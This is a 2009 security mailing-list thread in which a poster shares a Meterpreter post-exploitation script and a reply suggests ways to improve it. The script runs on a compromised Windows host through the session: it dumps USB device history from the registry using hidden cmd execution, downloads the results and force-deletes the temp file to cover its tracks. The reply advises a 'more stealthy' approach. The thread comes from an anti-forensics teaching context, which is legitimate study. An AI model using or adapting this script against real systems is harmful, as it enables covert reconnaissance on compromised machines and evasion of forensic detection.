Re: [Pauldotcom] Forensically interesting spots in the Windows 7, Vista and XP file system and registry (prep work for my anti-forensics class)

Fri, 14 Aug 2009 16:58:52 -0700 

save the data in the .msf3 log instead of writing it on the target, this
will make your script smaller and more stealthy. here is the function I use
for this on my scripts:

*#Function for writing data to a file*
*def filewrt(file2wrt, data2wrt)*
*        output = ::File.open(file2wrt, "a")*
*        data2wrt.each_line do |d|*
*                output.puts(d)*
*        end*
*        output.close*
*end*

just give it the log file and the data like this

*log = **"#{logs}\\installedusb.txt"*
*filewrt(log, message)*

to create the message string variable do it like this:

* message << " ==============================**
==============================**==============================**
==============================**\n" *
* message << "\tFriendly Name  : #{friendlyName.data}\n"*
* message <<   "\t\t - Class      : #{cl.data}\n" *
* message <<  "\t\t- DeviceDesc : #{deviceDesc.data}\n"*
* message << "\t\t - HardwareID : #{hardwareID.data}\n"*

Iterate thru each key, get the values and close the key before going to the
next.

I hope this helps


On Fri, Aug 14, 2009 at 4:47 PM, Dimitrios Kapsalis <[email protected]>wrote:

> Here is a meterpreter script to pull the USB devices from the registry.
>
> Few issues in saving the output to a text file on the target before
> downloading it. think its the \n that i'm adding. If anyone has any tips I'm
> all ears.
>
> As well the output on the meterpreter screen will be
>
> run installedusb
> [*] New session on 192.168.0.50:43304...
> [*] -- Files saved to C:\Documents and Settings\user\Application
> Data/.msf3/logs/installedsoftware/192.168.0.50_20090814.373838964...
> [*] -- Data logged to C:\DOCUME~1\user\LOCALS~1\Temp\25.dat....
> [*] Dumping software installed on pc per registry
> HKLM\SYSTEM\CurrentControlSet\Enum\USBSTOR...
> [*]
> ========================================================================================================================
>         * Friendly Name  : Apple iPod USB Device
>             - Class      : DiskDrive
>             - DeviceDesc : Disk drive
>             - HardwareID :
> USBSTOR\DiskApple___iPod____________1.62?USBSTOR\DiskApple___iPod____________?USBSTOR\DiskApple___?USBSTOR\Apple___iPod____________1?Apple___iPod____________1?USBSTOR\GenDisk?GenDisk??
>
> [*]     -- Downloading C:\DOCUME~1\user\LOCALS~1\Temp\25.dat....
> [*]     -- C:\Documents and Settings\user\Application
> Data/.msf3/logs/installedsoftware/192.168.0.50_20090814.373838964\installedusb.txt
> downloaded!
> [*] ...Done!!
> [*] Completed processing on 192.168.0.50:43304...
>
>
> [code]
> #
> # This is a Meterpreter script designed to be used by the Metasploit
> Framework
> #
> # Meterpreter script for pulling forensics data from registry for any USB
> device
> # connected to system
> #
> # Provided by Dimitrios Kapsalis
> # Verion: 0.1
>
>
> require 'fileutils'
>
> #
> ====================================================================================================================================
> # Print message to file on target
> #
> ====================================================================================================================================
> def m_writetofile(session,file,message)
>   cmd = "cmd /c echo #{message} >> #{file}"
>   m_exec(session, cmd)
> end
>
> #
> ====================================================================================================================================
> # Delete a file (meterpreter has no unlink API yet)
> #
> ====================================================================================================================================
> def m_unlink(session, path)
>   r = session.sys.process.execute("cmd.exe /c del /F /S /Q " + path, nil,
> {'Hidden' => 'true'})
>   while(r.name)
>     select(nil, nil, nil, 0.10)
>   end
>   r.close
> end
>
> #
> ====================================================================================================================================
> # Exec a command and return the results
> #
> ====================================================================================================================================
> def m_exec(session, cmd)
>   begin
>     r = session.sys.process.execute(cmd, nil, {'Hidden' => true,
> 'Channelized' => true})
>     b = ""
>     while(d = r.channel.read)
>       b << d
>     end
>     r.channel.close
>     r.close
>     b
>   rescue ::Exception => e
>     print_status("Error Running Command #{cmd}: #{e.class} #{e}")
>   end
> end
>
> #
> ====================================================================================================================================
> # Function to upload files
> #
> ====================================================================================================================================
> def m_upload(session,file)
>   location = session.fs.file.expand_path("%temp%")
>   fileontrgt = "#{location}\\#{rand(100)}.exe"
>   print_status("\t-- Uploading #{file}....")
>   session.fs.file.upload_file("#{fileontrgt}","#{file}")
>   print_status("\t-- #{file} uploaded!")
>   print_status("\t-- File on target #{fileontrgt}")
>   return fileontrgt
> end
>
> #
> ====================================================================================================================================
> # Function to download files
> #
> ====================================================================================================================================
> def m_download(session,src,dst)
>   location = session.fs.file.expand_path("%temp%")
>   print_status("\t-- Downloading #{src}....")
>   session.fs.file.download_file("#{dst}","#{src}")
>   print_status("\t-- #{dst} downloaded!")
> end
>
> #
> ====================================================================================================================================
> # Script proper
> #
> ====================================================================================================================================
>
> # The 'client' object holds the Meterpreter session
> # Aliasing here for plugin compatibility
> session = client
>
> script_name = "installedsoftware"
>
> # Extract the host and port
> host,port = session.tunnel_peer.split(':')
>
> print_status("New session on #{host}:#{port}...")
>
> # Create a directory for the logs
> logs = ::File.join(Msf::Config.config_directory, 'logs',script_name , host
> + "_" + Time.now.strftime("%Y%m%d.%M%S")+sprintf("%.5d",rand(100000)) )
>
> # Create the log directory
> ::FileUtils.mkdir_p(logs)
>
> print_status("-- Files saved to #{logs}...")
>
> location = session.fs.file.expand_path("%temp%")
> filename = "#{rand(100)}.dat"
> fileontrgt = "#{location}\\#{filename}"
> print_status("-- Data logged to #{fileontrgt}....")
>
>
> begin
>
>
> #===============================================================================================================================
>
> #===============================================================================================================================
>
> #===============================================================================================================================
> #    Pull USB history Pull USB history Pull USB history Pull USB history
> Pull USB history Pull USB history Pull USB history
>
> #===============================================================================================================================
>
> #===============================================================================================================================
>
> #===============================================================================================================================
>
>
> #===========================================================================================
>     # Dump USB device history
>
> #===========================================================================================
>
>     key = "HKLM\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR"
>     root_key, base_key = session.sys.registry.splitkey(key)
>
>
>     message =
> "---------------------------------------------------------------------"
>     m_writetofile(session,fileontrgt,message)
>     message = "Dumping software installed on pc per registry #{key}... "
>     print_status(message)
>     m_writetofile(session,fileontrgt,message)
>     message =
> "---------------------------------------------------------------------"
>     m_writetofile(session,fileontrgt,message)
>
>     session.sys.registry.create_key(root_key, base_key).each_key() do
> |device|
>         puts device
>
>         # =========================================
>         # ...
>         # =========================================
>         session.sys.registry.create_key(root_key,
> "#{base_key}\\#{device}").each_key() do |intermediate|
>             puts intermediate
>
>             rk = session.sys.registry.open_key(root_key,
> "#{base_key}\\#{device}\\#{intermediate}", KEY_READ)
>             cl = rk.query_value("class")
>             deviceDesc = rk.query_value("DeviceDesc")
>             friendlyName = rk.query_value("FriendlyName")
>             hardwareID = rk.query_value("HardwareID")
>             message = "
> ========================================================================================================================\n"
> <<
>                       "        * Friendly Name  : #{friendlyName.data}\n"
> <<
>                       "            - Class      : #{cl.data}\n" <<
>                       "            - DeviceDesc : #{deviceDesc.data}\n" <<
>                       "            - HardwareID : #{hardwareID.data}\n"
>
>
>             print_status(message)
>             m_writetofile(session,fileontrgt,message)
>         end
>     end
>
>
> #===========================================================================================
>     # download output file
>
> #===========================================================================================
>     m_download(session, fileontrgt, "#{logs}\\installedusb.txt")
>
>     sleep(3)
>
> #===========================================================================================
>     # delete exe from target system
>
> #===========================================================================================
>     m_unlink(session, fileontrgt)
>     print_status("...Done!!")
>
> rescue ::Exception => e
>     print_status("Exception: #{e.class} #{e} #{e.backtrace}")
> end
>
> print_status("Completed processing on #{host}:#{port}...")
> [/code]
>
>
>
>
> On Fri, Aug 14, 2009 at 12:57 PM, Dave Hull <[email protected]>wrote:
>
>> The user assist keys are ROT13 encoded!
>>
>> There's just so much good stuff. Volume shadow copies and restore
>> points too. And the list goes on...
>> _______________________________________________
>> Pauldotcom mailing list
>> [email protected]
>> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
>> Main Web Site: http://pauldotcom.com
>>
>
>
> _______________________________________________
> Pauldotcom mailing list
> [email protected]
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
>

_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

Reply via email to